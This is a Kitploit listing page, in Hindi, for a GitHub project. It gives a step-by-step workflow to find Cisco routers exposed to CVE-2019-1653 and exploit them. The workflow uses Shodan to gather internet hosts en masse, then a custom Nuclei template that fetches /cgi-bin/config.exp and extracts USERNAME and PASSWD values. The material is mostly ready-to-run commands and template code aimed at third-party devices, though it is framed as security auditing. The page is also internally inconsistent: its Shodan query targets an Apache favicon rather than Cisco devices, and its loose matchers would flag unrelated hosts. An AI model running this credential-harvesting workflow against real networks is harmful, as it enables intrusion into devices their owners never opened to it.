Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nuclei-CiscoRV320Dump-CVE-2019-1653 — स्वचालित Nuclei टेम्पलेट और Shodan वर्कफ़्लो Cisco राउटर कॉन्फ़िगरेशन एक्सपोज़र (CVE-2019-1653) का पता लगाने और शोषण करने के लिए सुरक्षा ऑडिटिंग हेतु। | Kitploit
उपकरण/GitHubGitHub/elzerjp/nuclei-ciscorv320dump-cve-2019-1653
OSINT (खुला स्रोत खुफिया)टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHubelzerjp/nuclei-ciscorv320dump-cve-2019-1653

nuclei-CiscoRV320Dump-CVE-2019-1653

स्वचालित Nuclei टेम्पलेट और Shodan वर्कफ़्लो Cisco राउटर कॉन्फ़िगरेशन एक्सपोज़र (CVE-2019-1653) का पता लगाने और शोषण करने के लिए सुरक्षा ऑडिटिंग हेतु।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
461 साल पहलेअभी तक समीक्षित नहीं

सिस्को राउटर कॉन्फ़िगरेशन एक्सपोज़र भेद्यता

भेद्यता का विवरण

यह रिपॉजिटरी कुछ सिस्को राउटर्स में एक भेद्यता के शोषण की प्रक्रिया का विवरण देती है जो एक सार्वजनिक URL के माध्यम से config.exp कॉन्फ़िगरेशन फ़ाइल के एक्सपोज़र की अनुमति देती है। इस फ़ाइल में संवेदनशील जानकारी हो सकती है, जिसमें क्रेडेंशियल (USERNAME और PASSWD), नेटवर्क कॉन्फ़िगरेशन और सिस्टम के अन्य महत्वपूर्ण विवरण शामिल हैं। यदि यह प्रमाणीकरण के बिना सुलभ है, तो यह डिवाइस और उस नेटवर्क की सुरक्षा से समझौता कर सकता है जिसमें इसे तैनात किया गया है।

संबंधित CVE

यह भेद्यता CVE-2003-1567 और CVE-2019-1653 से संबंधित हो सकती है, दोनों सिस्को डिवाइसों में कॉन्फ़िगरेशन फ़ाइलों के अनधिकृत एक्सपोज़र से संबंधित हैं, हालांकि यह जांचना महत्वपूर्ण है कि क्या विशिष्ट डिवाइस और फर्मवेयर इन CVE पर लागू होते हैं।

शोषण के लिए चरण-दर-चरण मार्गदर्शिका

यह प्रक्रिया कमजोर डिवाइसों की पहचान करने के लिए Shodan का उपयोग करती है, इसके बाद सिस्को राउटर्स में महत्वपूर्ण कॉन्फ़िगरेशन के एक्सपोज़र को स्कैन और सत्यापित करने के लिए Nuclei का उपयोग करती है।

पूर्वापेक्षाएँ

  • Shodan खाता: सुनिश्चित करें कि आपके पास Shodan पर एक खाता है और आपकी API Key कमांड लाइन से एक्सेस करने के लिए कॉन्फ़िगर की गई है।
  • Nuclei: आपके वातावरण में स्थापित, साथ ही नीचे वर्णित कस्टम Nuclei टेम्पलेट।
  • उपकरण: shodan-cli, awk, और httpx IP पतों को पूर्ण URL में बदलने के लिए।

चरण 1: Shodan पर कमजोर डिवाइसों की खोज करें

पहला कदम एक उन्नत खोज के माध्यम से Shodan पर कमजोर डिवाइसों की पहचान करना है। Shodan पर निम्नलिखित क्वेरी ऐसे डिवाइसों की खोज करती है जो संभावित रूप से सिस्को राउटर हैं:

root@kitploit:~
shodan download apache_results.json.gz "http.favicon.hash:-299287097 Apache"

यह कमांड:

  • Shodan पर एक खोज करता है जो Apache के फ़ेविकॉन वाले डिवाइसों की पहचान करता है, एक विशिष्ट हैश के साथ जो Apache से संबंधित सर्वरों की पहचान करता है। यह सर्वर ऑडिट के संदर्भ में उपयोगी है।

चरण 2: परिणाम डाउनलोड करें और URLs को फ़ॉर्मेट करें

एक बार जब आपके पास apache_results.json.gz फ़ाइल हो, तो अगला कदम प्रत्येक डिवाइस से IP और पोर्ट निकालना है ताकि प्रोटोकॉल (http या https) और पोर्ट सहित पूर्ण URLs बनाया जा सके।

.json फ़ाइल से डेटा संसाधित करने का कमांड

URLs को पूर्ण URLs में निकालने और फ़ॉर्मेट करने के लिए urls.txt नामक फ़ाइल में निम्नलिखित कमांड का उपयोग करें:

root@kitploit:~
shodan parse --fields ip_str,port,ssl.version apache_results.json.gz | \
awk '{if ($2 == 443 || $3 ~ /https/) print "https://"$1":"$2; else print "http://"$1":"$2}' > urls.txt
  • shodan parse: apache_results.json.gz फ़ाइल में प्रत्येक परिणाम से IP और पोर्ट निकालता है।
  • awk: आउटपुट को पूर्ण URLs में फ़ॉर्मेट करता है, यदि पोर्ट 443 है या SSL का पता चलता है तो https का उपयोग करता है, अन्यथा http का उपयोग करता है।

urls.txt फ़ाइल में अब पूर्ण और फ़ॉर्मेटेड URLs हैं।

चरण 3: एक कस्टम Nuclei टेम्पलेट बनाएँ

यह जांचने के लिए कि क्या इन डिवाइसों पर config.exp फ़ाइल सुलभ है, हम एक कस्टम Nuclei टेम्पलेट का उपयोग करेंगे। यह टेम्पलेट फ़ाइल तक पहुँचने का प्रयास करेगा और यदि मौजूद हैं तो USERNAME और PASSWD जैसे संवेदनशील डेटा निकालेगा।

Nuclei टेम्पलेट (cisco-router-config-exposure.yaml)

root@kitploit:~
id: cisco-router-config-exposure
info:
  name: Cisco Router Configuration Exposure
  author: elzer
  severity: high
  description: |
    Detecta la exposición del archivo config.exp en routers Cisco que contiene credenciales y configuraciones críticas.

tags:
  - cisco
  - router
  - vulnerability
  - cgi-bin
  - config.exp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/config.exp"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "Cisco"
          - "config"
          - "version"
      - type: regex
        regex:
          - "USERNAME=\\w+"
          - "PASSWD=[a-f0-9]{32}"

यह टेम्पलेट:

  • /cgi-bin/config.exp फ़ाइल पर GET अनुरोध भेजता है।
  • जाँचता है कि क्या प्रतिक्रिया में एक्सपोज़र की पुष्टि करने के लिए विशिष्ट कीवर्ड या पैटर्न (Cisco, config, version) हैं।
  • यदि फ़ाइल में मौजूद हैं तो USERNAME और PASSWD के मान निकालने का प्रयास करता है।

इस टेम्पलेट को Nuclei टेम्पलेट फ़ोल्डर में cisco-router-config-exposure.yaml के रूप में सहेजें।

चरण 4: कमजोर डिवाइसों का पता लगाने के लिए Nuclei चलाएँ

टेम्पलेट और urls.txt फ़ाइल तैयार होने पर, URLs को स्कैन करने के लिए Nuclei का निम्नलिखित कमांड चलाएँ:

root@kitploit:~
nuclei -t path/to/cisco-router-config-exposure.yaml -l urls.txt -o resultados_nuclei.txt -debug -vv
  • -t path/to/cisco-router-config-exposure.yaml: हमारे द्वारा बनाए गए कस्टम टेम्पलेट को इंगित करता है।
  • -l urls.txt: फ़ॉर्मेटेड URLs वाली urls.txt फ़ाइल का उपयोग करता है।
  • -o resultados_nuclei.txt: परिणामों को resultados_nuclei.txt फ़ाइल में सहेजता है।
  • -debug -vv: प्रगति और डिबग विवरण देखने के लिए Nuclei को विस्तृत मोड में चलाता है।

परिणाम

Nuclei चलाने के बाद, resultados_nuclei.txt फ़ाइल में कमजोर डिवाइसों की एक सूची होगी जो config.exp कॉन्फ़िगरेशन फ़ाइल को एक्सपोज़ करते हैं। इसमें कोई भी डिवाइस शामिल होगा जो क्रेडेंशियल या संवेदनशील कॉन्फ़िगरेशन लौटाता है, जो भेद्यता के एक्सपोज़र की पुष्टि करता है।

निष्कर्ष

यह प्रक्रिया आपको Shodan और Nuclei का उपयोग करके सिस्को डिवाइसों में महत्वपूर्ण कॉन्फ़िगरेशन फ़ाइलों के एक्सपोज़र की पहचान और पुष्टि करने की अनुमति देती है। इस प्रवाह का स्वचालन विशेष रूप से सुरक्षा ऑडिटरों और साइबर सुरक्षा पेशेवरों के लिए उपयोगी है जो कॉर्पोरेट नेटवर्क में असुरक्षित कॉन्फ़िगरेशन की पहचान और सुधार में रुचि रखते हैं।

टूल डाउनलोड करें